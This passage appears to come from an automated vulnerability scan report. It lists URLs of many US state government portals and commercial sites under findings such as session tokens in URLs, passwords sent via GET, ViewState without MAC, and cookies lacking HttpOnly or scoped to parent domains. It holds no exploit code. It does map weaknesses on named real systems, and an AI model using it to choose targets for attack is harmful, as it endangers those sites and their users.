7.62. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

7.63. https://www.nrsservicecenter.com/iApp/ret/landing.do

7.64. https://www.nrsservicecenter.com/iApp/ret/showPage.do

7.65. https://www.scsignon.sc.gov/

7.66. https://www.tennesseeanytime.org/paams-app/index.htm

7.67. https://www.texasonline.state.tx.us/NASApp/rap/apps/license/jsp/eng/welcome.jsp

7.68. https://www.vermontjoblink.com/ada/

7.69. https://www.vermontjoblink.com/ada/404/404_qry.cfm

7.70. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm

7.71. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm

7.72. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico

7.73. https://www.vermontjoblink.com/ada/default.cfm

7.74. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

7.75. https://www.vermontjoblink.com/ada/leavesite.cfm

7.76. https://www.vermontjoblink.com/ada/mn_eligibility_dsp.cfm

7.77. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

7.78. https://www.vermontjoblink.com/ada/mn_login_fnc.cfm

7.79. https://www.vermontjoblink.com/ada/mn_offices_dsp.cfm

7.80. https://www.vermontjoblink.com/ada/mn_protectyourself_dsp.cfm

7.81. https://www.vermontjoblink.com/ada/mn_quicksearch_dsp.cfm

7.82. https://www.vermontjoblink.com/ada/mn_registration_dsp.cfm

7.83. https://www.vermontjoblink.com/ada/mn_settings_dsp.cfm

7.84. https://www.vermontjoblink.com/ada/mn_ssncheck.cfm

7.85. https://www.vermontjoblink.com/ada/mn_veterans_dsp.cfm

7.86. https://www.vermontjoblink.com/ada/mn_warn_dsp.cfm

7.87. https://www.vermontjoblink.com/ada/services/schools/schsearch.cfm

7.88. https://www.vermontjoblink.com/ada/works/FAQ.cfm

7.89. https://www.vermontjoblink.com/ada/works/Login.cfm

7.90. https://www.vermontjoblink.com/ada/works/contactus.cfm

7.91. https://www.vermontjoblink.com/ada/works/employeroverview.cfm

7.92. https://www.vermontjoblink.com/ada/works/joboverview.cfm

7.93. https://www.vermontjoblink.com/ada/works/jobsearch.cfm

7.94. https://www.vermontjoblink.com/ada/works/linkview.cfm

7.95. https://www.vermontjoblink.com/ada/works/resourcesoverview.cfm

7.96. https://www.vermontjoblink.com/favicon.ico

7.97. https://adwords.google.com/um/StartNewLogin

7.98. https://ask.census.gov/cgi-bin/askcensus.cfg/php/enduser/std_adp.php

7.99. https://assist.dhss.delaware.gov/INCLUDES/INJSC.JS

7.100. https://assist.dhss.delaware.gov/PGM/asp/pdf/form204GoodCauseforReftoCoopinDSCE.pdf

7.101. https://assist.dhss.delaware.gov/Style/ASSIST_SC_StyleNET.css

7.102. https://assist.dhss.delaware.gov/Style/Assist_Style_NET.css

7.103. https://assist.dhss.delaware.gov/favicon.ico

7.104. https://assist.dhss.delaware.gov/images/Assist_header_people.jpg

7.105. https://assist.dhss.delaware.gov/images/Assist_header_text.gif

7.106. https://assist.dhss.delaware.gov/images/Assist_logo.gif

7.107. https://assist.dhss.delaware.gov/images/arrow_center.gif

7.108. https://assist.dhss.delaware.gov/images/arrow_left.gif

7.109. https://assist.dhss.delaware.gov/images/arrow_right.gif

7.110. https://assist.dhss.delaware.gov/images/corner_brown_color.gif

7.111. https://assist.dhss.delaware.gov/images/corner_teal_color.gif

7.112. https://assist.dhss.delaware.gov/images/gold_rule_shim.gif

7.113. https://assist.dhss.delaware.gov/images/shim.gif

7.114. https://favorites.live.com/quickadd.aspx

7.115. https://fortress.wa.gov/dol/dolprod/vehoffices/

7.116. https://iris.custhelp.com/euf/assets/css/2009/jkmegamenu.css

7.117. https://iris.custhelp.com/euf/assets/css/2009/va-styles.css

7.118. https://iris.custhelp.com/euf/assets/css/2009/va-user-styles.css

7.119. https://iris.custhelp.com/euf/assets/css/2009/vaSearch.css

7.120. https://iris.custhelp.com/euf/rightnow/optimized/templates/ps_iris_home1302801724.themes.iris.SITE.css

7.121. https://iris.custhelp.com/rnt/rnw/css/enduser.css

7.122. https://iris.custhelp.com/rnt/rnw/img/enduser/2009/img-bullet.gif

7.123. https://iris.custhelp.com/rnt/rnw/javascript/2009/global.js

7.124. https://iris.va.gov/favicon.ico

7.125. https://maps-api-ssl.google.com/maps

7.126. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php

7.127. https://pixel.fetchback.com/serve/fb/pdc

7.128. https://treas-secure.treas.state.mi.us/eservice_enu/start.swe

7.129. https://www.accesskansas.org/dissolutions/

7.130. https://www.accesskansas.org/images/footer_images/current_year.gif

7.131. https://www.accesskansas.org/images/footer_images/from2002.gif

7.132. https://www.accesskansas.org/kbc/img/icons/external.png

7.133. https://www.alabamainteractive.org/favicon.ico

7.134. https://www.bbb.org/online/consumer/cks.aspx

7.135. https://www.colorado.gov/apps/feedback/servlet/begin

7.136. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx

7.137. https://www.mcafeesecure.com/RatingVerify

7.138. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css

7.139. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css

7.140. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css

7.141. https://www.nrsservicecenter.com/content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg

7.142. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif

7.143. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg

7.144. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg

7.145. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg

7.146. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif

7.147. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif

7.148. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif

7.149. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif

7.150. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js

7.151. https://www.nrsservicecenter.com/favicon.ico

7.152. https://www.ri.gov/Licensing/renewal/license.php

7.153. https://www.scsignon.sc.gov/Common/HelpWindow.aspx

7.154. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx

7.155. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx

7.156. https://www.scsignon.sc.gov/Login.aspx

7.157. https://www.scsignon.sc.gov/SCBOS.Core.DynamicFormsGlobal.Resources.aspx

7.158. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Imaging.Resources.aspx

7.159. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.Controls.Resources.aspx

7.160. https://www.scsignon.sc.gov/SCBOS.Core.Framework.Web.UI.Resources.aspx

7.161. https://www.scsignon.sc.gov/WebResource.axd

7.162. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx

8. Session token in URL

8.1. http://apps.tn.gov/bizreg/tax.jsp

8.2. https://apps.tn.gov/bizreg/tax.jsp

8.3. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp

8.4. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp

8.5. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

8.6. http://az.gov/app/calendar/CalendarRemoteDisplay.xhtml

8.7. http://az.gov/app/calendar/a4j_3_1_3.GAorg/richfaces/renderkit/html/css/calendar.xcss/DATB/eAELvfwiAQAGAQJx

8.8. http://bh.contextweb.com/bh/set.aspx

8.9. http://de.gov/

8.10. http://de.gov/profile.php

8.11. http://ga.gov/00/home/0,2061,4802,00.html

8.12. http://ga.gov/00/home/0,2061,4802,00.html

8.13. http://kodakimagingnetworki.tt.omtrdc.net/m2/kodakimagingnetworki/mbox/standard

8.14. http://l.sharethis.com/pview

8.15. https://louisianadcpretire.gwrs.com/login.do

8.16. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

8.17. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

8.18. http://mt0.googleapis.com/mapslt/ft

8.19. https://myalaska.state.ak.us/home/app

8.20. http://server.iad.liveperson.net/hc/33511087/

8.21. https://services.georgia.gov/dhr/cspp/do/public/Welcome

8.22. http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566

8.23. http://www.ehawaii.gov/dakine/index.html

8.24. http://www.goccp.maryland.gov/lists/index.php

8.25. http://www.in.gov/dhs/3163.htm

8.26. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

8.27. http://www.legis.state.pa.us/cfdocs/legis/PN/Public/btCheck.cfm

8.28. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

8.29. http://www.utah.gov/transparency/index.html

9. SSL certificate

9.1. https://nhlicenses2.nh.gov/

9.2. https://mibid.bidcorp.com/

9.3. https://nhlicenses.nh.gov/

9.4. https://treas-secure.treas.state.mi.us/

9.5. https://www.alabamainteractive.org/

9.6. https://www.compasssmartshopper.com/

9.7. https://www.nrsservicecenter.com/

10. Password field submitted using GET method

10.1. http://digg.com/submit

10.2. http://www.alabama.gov/portal/index.jsp

11. ASP.NET ViewState without MAC enabled

11.1. https://fortress.wa.gov/dol/dolprod/dsdoffices/

11.2. https://home.mcafee.com/secure/cart

11.3. https://home.mcafee.com/secure/cart/

11.4. https://home.mcafee.com/secure/purchase/

11.5. http://sd.gov/headlines/headlines_home/headlines.aspx

11.6. http://www.vitalchek.com/louisiana-express-vital-records.aspx

12. Open redirection

13. Cookie scoped to parent domain

13.1. http://api.twitter.com/1/statuses/user_timeline/okgov.json

13.2. https://fin.oaks.ohio.gov/psp/FNPRD/

13.3. https://hcm.oaks.ohio.gov/psp/HCPRD/

13.4. http://home.mcafee.com/

13.5. http://home.mcafee.com/AdviceCenter/Default.aspx

13.6. http://home.mcafee.com/Default.aspx

13.7. http://home.mcafee.com/Root/AboutUs.aspx

13.8. http://home.mcafee.com/Root/Support.aspx

13.9. http://home.mcafee.com/SiteMap.aspx

13.10. http://home.mcafee.com/Store/

13.11. http://home.mcafee.com/Store/Downloads.aspx

13.12. http://home.mcafee.com/VirusInfo/

13.13. http://home.mcafee.com/root/MyAccount.aspx

13.14. http://home.mcafee.com/root/dynamicpage.aspx

13.15. http://home.mcafee.com/store/default.aspx

13.16. http://home.mcafee.com/supportpages/privacyFeedback.aspx

13.17. http://home.mcafee.com/supportpages/purchasehelp.aspx

13.18. https://home.mcafee.com/ScriptResource.axd

13.19. https://home.mcafee.com/Secure/Protected/Login.aspx

13.20. https://home.mcafee.com/WebResource.axd

13.21. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

13.22. https://home.mcafee.com/secure/cart

13.23. https://home.mcafee.com/secure/cart/

13.24. https://home.mcafee.com/secure/purchase/

13.25. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/

13.26. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

13.27. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

13.28. http://us.mcafee.com/root/basket.asp

13.29. http://www.coloradochannel.net/

13.30. http://www.exploreohio.org/node/11452

13.31. http://www.georgiawildlife.com/

13.32. http://www.georgiawildlife.com/boating/registration

13.33. http://www.georgiawildlife.com/node/1873

13.34. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm

13.35. http://www.illinois.gov/PressReleases/ShowPressRelease.cfm

13.36. http://www.illinois.gov/PressReleases/ShowbyM.cfm

13.37. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

13.38. http://www.netflix.com/

13.39. http://www.netflix.com/NRD/PS3

13.40. http://www.netflix.com/NRD/Wii

13.41. http://www.netflix.com/NRD/Xbox

13.42. http://www.opensource.org/licenses/mit-license.php

13.43. http://www.tanfa.co.uk/archives/show.asp

13.44. http://www.vsea.org/

13.45. http://a.triggit.com/px

13.46. http://ads.adbrite.com/adserver/vdi/711384

13.47. https://adwords.google.com/select/Login

13.48. https://adwords.google.com/um/StartNewLogin

13.49. http://b.scorecardresearch.com/b

13.50. http://bh.contextweb.com/bh/rtset

13.51. http://bh.contextweb.com/bh/set.aspx

13.52. http://blogsearch.google.com/

13.53. http://books.google.com/bkshp

13.54. http://books.google.com/books

13.55. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.56. http://del.icio.us/post

13.57. https://favorites.live.com/quickadd.aspx

13.58. http://finance.yahoo.com/q

13.59. http://groups.google.com/grphp

13.60. http://i.w55c.net/rs

13.61. http://ib.adnxs.com/seg

13.62. http://id.google.com/verify/EAAAAJR-W9n_BEIB_zbNgVGlkRI.gif

13.63. http://id.google.com/verify/EAAAAJjd7InK0_AwgsQIx0lPt28.gif

13.64. http://id.google.com/verify/EAAAAMOrTls6merGAfxdZppvi6I.gif

13.65. http://id.google.com/verify/EAAAAP-cj6E6L5hPaay4uczj5Ho.gif

13.66. http://idcs.interclick.com/Segment.aspx

13.67. http://image.providesupport.com/js/hic/safe-standard.js

13.68. http://image.providesupport.com/js/hic/safe-textlink.js

13.69. http://image2.pubmatic.com/AdServer/Pug

13.70. http://kdkgllry.netmng.com/

13.71. http://khmdb0.google.com/kh

13.72. http://khmdb1.google.com/kh

13.73. https://maps-api-ssl.google.com/maps

13.74. http://metrics.kodakgallery.com/b/ss/kinkodakgallerycomprod/1/H.22.1/s78523519213777

13.75. http://newbrowse.livehelper.com/servlet/lhBrowse

13.76. http://picasaweb.google.com/home

13.77. http://picasaweb.google.com/lh/view

13.78. http://pipes.yahoo.com/pipes/pipe.run

13.79. https://pixel.fetchback.com/serve/fb/pdc

13.80. http://pixel.mathtag.com/event/img

13.81. http://pixel.quantserve.com/pixel

13.82. http://pixel.rubiconproject.com/tap.php

13.83. http://scholar.google.com/schhp

13.84. http://server.iad.liveperson.net/hc/33511087/

13.85. http://shots.snap.com/snap_shots.js

13.86. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s21968461417127

13.87. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22063515547197

13.88. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s22238083938136

13.89. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s25464643554296

13.90. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27148967052344

13.91. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s2762329166755

13.92. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s27866187379695

13.93. http://stateofgeorgia.122.2o7.net/b/ss/georgiagovprod/1/H.16/s29011461706832

13.94. http://video.google.com/

13.95. http://www.access-board.gov/sec508/guide/1194.22.htm

13.96. http://www.facebook.com/TeamHaslam

13.97. http://www.facebook.com/WSDOL

13.98. http://www.facebook.com/campaign/landing.php

13.99. http://www.facebook.com/note.php

13.100. http://www.facebook.com/ohiodivisionofwatercraft

13.101. http://www.facebook.com/pages/Austin-TX/Texasgov/117263931626845

13.102. http://www.facebook.com/pages/Social-Circle-GA/Wildlife-Resources-Division-GADNR/101012503387

13.103. http://www.facebook.com/pages/Trenton-NJ/NJ-Department-of-Education-Family-and-Community-Relations/122601104423680

13.104. http://www.facebook.com/photo.php

13.105. http://www.facebook.com/share.php

13.106. http://www.facebook.com/video/video.php

13.107. http://www.flickr.com/groups_join.gne

13.108. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp

13.109. http://www.linkedin.com/companies/166141

13.110. http://www.molottery.com/winningNumbers.do

13.111. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/Ohio457-site.css

13.112. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/base-style.css

13.113. https://www.nrsservicecenter.com/content/media/retail/css/dcdweb/print.css

13.114. https://www.nrsservicecenter.com/content/media/retail/images/AdTeasers/Ohio457/NewWelcomeBanner.jpg

13.115. https://www.nrsservicecenter.com/content/media/retail/images/Logos/Ohio457.gif

13.116. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradient.jpg

13.117. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientAcctLogin.jpg

13.118. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/bgGrads/bgGradientHomeContentAreas.jpg

13.119. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabLeft.gif

13.120. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/navTabs/tabRight.gif

13.121. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-button.gif

13.122. https://www.nrsservicecenter.com/content/media/retail/images/Ohio457/sprites/login-lock.gif

13.123. https://www.nrsservicecenter.com/content/media/retail/js/wtlOhio.js

13.124. https://www.nrsservicecenter.com/favicon.ico

13.125. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

13.126. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

13.127. https://www.nrsservicecenter.com/iApp/ret/landing.do

13.128. https://www.nrsservicecenter.com/iApp/ret/showPage.do

13.129. http://www.real.com/realplayer

13.130. http://www.reserveamerica.com/la/state/campgrounds/r/campgroundDirectoryList.do

14. Cookie without HttpOnly flag set

14.1. https://apps.tn.gov/bizreg/bizregprog

14.2. https://apps.tn.gov/bizreg/tax.jsp

14.3. https://apps.tn.gov/biztax-app/login.html

14.4. https://apps.tn.gov/paams-app/index.htm

14.5. https://apps.tn.gov/paams-app/recover/resetpassword.htm

14.6. https://apps.tn.gov/paams-app/recover/retrieveusermane.htm

14.7. https://assist.dhss.delaware.gov/PGM/ASP/SAACC.asp

14.8. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp

14.9. https://assist.dhss.delaware.gov/PGM/ASP/SC001.asp

14.10. https://assist.dhss.delaware.gov/PGM/ASP/SC002.asp

14.11. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

14.12. https://assist.dhss.delaware.gov/PGM/ASP/SC020.asp

14.13. https://assist.dhss.delaware.gov/PGM/ASP/SC024.asp

14.14. https://assist.dhss.delaware.gov/PGM/ASP/SC031.asp

14.15. http://az.gov/app/calendar/CalendarRemoteDisplay.xhtml

14.16. http://badge.dopiaza.org/flickr/badge.php

14.17. http://ca.gov/

14.18. http://cityofmuscleshoals.com/Default.asp

14.19. http://crd.dnr.state.ga.us/content/displaynavigation.asp

14.20. https://dhr.ky.gov/DHRWeb/RS

14.21. http://dnr.maryland.gov/service/

14.22. https://dotax.ehawaii.gov/efile/user

14.23. https://edmv-sp.dot.state.nc.us/sp/NoticeServlet

14.24. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp

14.25. http://elicense4-lookup.com.ohio.gov/SearchCriteria.asp

14.26. http://factfinder.census.gov/servlet/EconSectorServlet

14.27. https://fin.oaks.ohio.gov/psp/FNPRD/

14.28. https://fortress.wa.gov/dol/dolprod/dsdoffices/

14.29. http://ga.gov/

14.30. http://ga.gov/gta/GTASearch

14.31. http://ga.gov/mobile

14.32. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp

14.33. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp

14.34. https://georgiawildlife.dnr.state.ga.us/service/login1.asp

14.35. https://hcm.oaks.ohio.gov/psp/HCPRD/

14.36. http://home.mcafee.com/

14.37. http://home.mcafee.com/AdviceCenter/Default.aspx

14.38. http://home.mcafee.com/Default.aspx

14.39. http://home.mcafee.com/Root/AboutUs.aspx

14.40. http://home.mcafee.com/Root/Support.aspx

14.41. http://home.mcafee.com/SiteMap.aspx

14.42. http://home.mcafee.com/Store/

14.43. http://home.mcafee.com/Store/Downloads.aspx

14.44. http://home.mcafee.com/VirusInfo/

14.45. http://home.mcafee.com/root/MyAccount.aspx

14.46. http://home.mcafee.com/root/dynamicpage.aspx

14.47. http://home.mcafee.com/store/default.aspx

14.48. http://home.mcafee.com/supportpages/privacyFeedback.aspx

14.49. http://home.mcafee.com/supportpages/purchasehelp.aspx

14.50. https://home.mcafee.com/ScriptResource.axd

14.51. https://home.mcafee.com/Secure/Protected/Login.aspx

14.52. https://home.mcafee.com/WebResource.axd

14.53. https://home.mcafee.com/WebServices/AccountWebSvc.asmx/js

14.54. https://home.mcafee.com/secure/cart

14.55. https://home.mcafee.com/secure/cart/

14.56. https://home.mcafee.com/secure/purchase/

14.57. http://hpd.dnr.state.ga.us/content/displaycontent.asp

14.58. http://il.gov/

14.59. http://ilsapp.lib.de.us/uhtbin/cgisirsi/x/x/0/5

14.60. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm

14.61. http://le.utah.gov/asp/lfa/lfareports.asp

14.62. http://legis.state.la.us/main.asp

14.63. http://legis.state.la.us/main.asp

14.64. http://legis.state.la.us/main.asp

14.65. https://license.ohio.gov/lookup/default.asp

14.66. https://louisianadcpretire.gwrs.com/login.do

14.67. http://maillist2.nh.gov/lists/

14.68. http://mhcc.maryland.gov/consumerinfo/hospitalguide/hospital_guide/reports/find_a_hospital/index.asp

14.69. https://moversguide.usps.com/icoa/flow.do

14.70. https://myalaska.state.ak.us/home/app

14.71. http://nc.gov/favicon.ico

14.72. http://ncchildcaresearch.dhhs.state.nc.us/search.asp

14.73. http://nd.gov/

14.74. http://nd.gov/category.htm

14.75. http://nd.gov/content.htm

14.76. http://nd.gov/postcard.htm

14.77. https://nhlicenses.nh.gov/MyLicense%20Verification/Search.aspx

14.78. https://njmvcscheduling.state.nj.us/tc/driverlogin.do

14.79. http://nvsos.gov/index.aspx

14.80. https://onestop.michigan.gov/OneStop/a

14.81. https://onestop.michigan.gov/OneStop/ssoNeedPassword.do

14.82. https://onestop.michigan.gov/onestop-main/OneStop/ssoRegistration.do

14.83. http://pa.gov/portal/server.pt

14.84. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/pagov_portal_header/images/temp/header_logo.gif

14.85. http://pa.gov/portal/server.pt/gateway/PTARGS_0_2_24662_0_51_43/http%3B/pubcontent.state.pa.us/publishedcontent/publish/cop_general_government_operations/pagov/branding/stylesheets/pagov.css

14.86. http://path.trackinglabs.com/c.php

14.87. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/

14.88. https://portal.s4web.state.mn.us/psp/por91ssap/SELFSERVICE/ENTP/h/

14.89. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

14.90. http://puco.ohio.gov/Puco/Utilities/OneStop.cfm

14.91. http://puco.ohio.gov/puco/forms/form.cfm

14.92. http://regulatorystaff.sc.gov/orsContent.asp

14.93. https://secure.apps.state.nd.us/dot/mv/mvrenewal/renewal.htm

14.94. https://secure.sces.org/PDIC/GatewayServlet

14.95. https://secure.utah.gov/rex/

14.96. https://secure.utah.gov/rex/index.html

14.97. https://services.georgia.gov/dhr/cspp/do/public/Welcome

14.98. http://smu.governor.delaware.gov/cgi-bin/mail.php

14.99. http://smu.portal.delaware.gov/cgi-bin/mail.php

14.100. http://sussex.de.schoolwebpages.com/education/school/school.php

14.101. https://unitedalert.com/

14.102. http://us.mcafee.com/root/basket.asp

14.103. http://us.mcafee.com/root/basket.asp

14.104. http://us.mcafee.com/root/basket.asp

14.105. http://us.mcafee.com/root/basket.asp

14.106. http://va.gov/ext_redirect.asp

14.107. http://va.gov/ext_redirect.asp

14.108. https://web.globalpay.com/taxpayer/default.asp

14.109. http://webapps6.doc.state.nc.us/opi/offenderescapesearch.do

14.110. http://webapps6.doc.state.nc.us/opi/offenderreleasesearch.do

14.111. http://www.511ia.org/default.asp

14.112. https://www.accesskansas.org/bess/flow/main

14.113. https://www.accesskansas.org/businesscenter/index.html

14.114. https://www.accesskansas.org/dissolutions/

14.115. http://www.adfg.alaska.gov/index.cfm

14.116. http://www.agriculture.state.tn.us/Marketing.asp

14.117. http://www.alabama.gov/portal/index.jsp

14.118. https://www.alabamainteractive.org/abc_license/

14.119. http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566

14.120. http://www.buzgate.org/8.0/ny/fh.html

14.121. http://www.capehenlopenschools.com/education/district/district.php

14.122. http://www.carson-city.nv.us/Index.aspx

14.123. http://www.colorado.gov/

14.124. http://www.colorado.gov/cs/Satellite

14.125. http://www.coloradochannel.net/

14.126. http://www.conwaygreene.com/nmonesource/publicLicense.aspx

14.127. http://www.cotrip.org/device.htm

14.128. http://www.dds.ga.gov/drivers/DLdata.aspx

14.129. http://www.deldot.gov/public.ejs

14.130. http://www.delmar.k12.de.us/education/district/district.php

14.131. http://www.dhh.louisiana.gov/links.asp

14.132. http://www.dhh.louisiana.gov/offices/

14.133. http://www.dhh.louisiana.gov/offices/email-page.asp

14.134. http://www.dhh.louisiana.gov/offices/faq.asp

14.135. http://www.dhh.louisiana.gov/offices/inquiryform.asp

14.136. http://www.dhh.louisiana.gov/offices/links.asp

14.137. http://www.dhh.louisiana.gov/offices/locations.asp

14.138. http://www.dhh.louisiana.gov/offices/page.asp

14.139. http://www.dhh.louisiana.gov/offices/page.asp

14.140. http://www.dhh.louisiana.gov/offices/publications.asp

14.141. http://www.dhh.louisiana.gov/offices/reports.asp

14.142. http://www.dhh.louisiana.gov/page.asp

14.143. http://www.dms.myflorida.com/mfmp

14.144. http://www.dsf.health.state.pa.us/health/cwp/view.asp

14.145. http://www.energyguide.com/EnergySmartSBE/welcomeba.asp

14.146. http://www.exploreohio.org/node/11452

14.147. http://www.flsenate.gov/Legislators/index.cfm

14.148. http://www.georgia.gov/external/

14.149. http://www.georgia.gov/gta/translate/0,2678,4802,00.html

14.150. http://www.georgiawildlife.com/

14.151. http://www.georgiawildlife.com/boating/registration

14.152. http://www.georgiawildlife.com/node/1873

14.153. http://www.goccp.maryland.gov/lists/index.php

14.154. http://www.governor.state.pa.us/portal/server.pt

14.155. http://www.governor.wa.gov/news/news-view.asp

14.156. http://www.healthynh.com/index-fhc.php

14.157. http://www.heretohelp.pa.gov/portal/server.pt

14.158. http://www.hoosierdata.in.gov/nav.asp

14.159. https://www.humanservices.state.pa.us/idm/managedidmpub/ca12/index.jsp

14.160. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm

14.161. http://www.illinois.gov/PressReleases/ShowPressRelease.cfm

14.162. http://www.illinois.gov/PressReleases/ShowbyM.cfm

14.163. http://www.in.gov/sliverheader/Welcome.do

14.164. http://www.instacam.com/search.asp

14.165. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

14.166. http://www.legis.louisiana.gov/boards/board_members.asp

14.167. http://www.legis.state.la.us/billdata/bytype.asp

14.168. http://www.linkedin.com/companies/166141

14.169. http://www.mema.state.md.us/MEMA/content_page.jsp

14.170. http://www.molottery.com/winningNumbers.do

14.171. http://www.money-rates.com/news/10-best-states-for-making-a-living.htm

14.172. http://www.ms.gov/

14.173. http://www.ms.gov/how_do_i_answer_page.jsp

14.174. http://www.ms.gov/how_do_i_fulllist.jsp

14.175. http://www.ms.gov/how_do_i_sub_answer_page.jsp

14.176. http://www.ms.gov/ms_sub_sub_template.jsp

14.177. http://www.ms.gov/ms_sub_template.jsp

14.178. http://www.ms.gov/online_services_sub_sub_all.jsp

14.179. http://www.ms.gov/state_agencies_alpha.jsp

14.180. https://www.myhealth.va.gov/mhv-portal-web/anonymous.portal

14.181. http://www.nccourts.org/Citizens/GoToCourt/Default.asp

14.182. http://www.nccrimecontrol.org/Index2.cfm

14.183. http://www.nd.gov/content.htm

14.184. http://www.netflix.com/

14.185. http://www.netflix.com/NRD/PS3

14.186. http://www.netflix.com/NRD/Wii

14.187. http://www.netflix.com/NRD/Xbox

14.188. http://www.nist.gov/search-results.cfm

14.189. http://www.nmshtd.state.nm.us/main.asp

14.190. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

14.191. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

14.192. https://www.nrsservicecenter.com/iApp/ret/landing.do

14.193. https://www.nrsservicecenter.com/iApp/ret/showPage.do

14.194. http://www.ok.gov/genthree/get_resized_image.php

14.195. http://www.ok.gov/genthree/rt_get_resized_image.php

14.196. http://www.opensource.org/licenses/mit-license.php

14.197. http://www.p2pays.org/ref/07/06568/2001/nframe.asp

14.198. http://www.pa.gov/portal/server.pt

14.199. http://www.portal.state.pa.us/portal/server.pt/document/1036792/corbettwebphoto_jpg

14.200. http://www.psp.state.pa.us/portal/server.pt

14.201. http://www.qualityinfo.org/olmisj/OlmisZine

14.202. http://www.real.com/realplayer

14.203. http://www.reserveamerica.com/la/state/campgrounds/r/campgroundDirectoryList.do

14.204. http://www.scdmvonline.com/DMVNew/default.aspx

14.205. http://www.sled.state.sc.us/sled/default.asp

14.206. http://www.sus.edu/CatSubCat/CatSubCat.asp

14.207. http://www.tanfa.co.uk/archives/show.asp

14.208. https://www.tennesseeanytime.org/paams-app/index.htm

14.209. http://www.texasonline.state.tx.us/app/orig/index.jsp

14.210. http://www.theoutdoorshop.state.pa.us/FBG/game/GameLicenseSelect.asp

14.211. http://www.txdmv.gov/vehicles/registration/register.htm

14.212. http://www.utah.gov/locationaware/getMeetings.html

14.213. http://www.utah.gov/pmn/sitemap/notice/67945.html

14.214. http://www.utah.gov/services/

14.215. http://www.utah.gov/services/business.html

14.216. http://www.utah.gov/services/financial.html

14.217. http://www.utah.gov/services/index.html

14.218. http://www.utah.gov/transparency/entity_profile.html

14.219. http://www.utah.gov/transparency/index.html

14.220. http://www.utah.gov/whatsnew/rss.xml

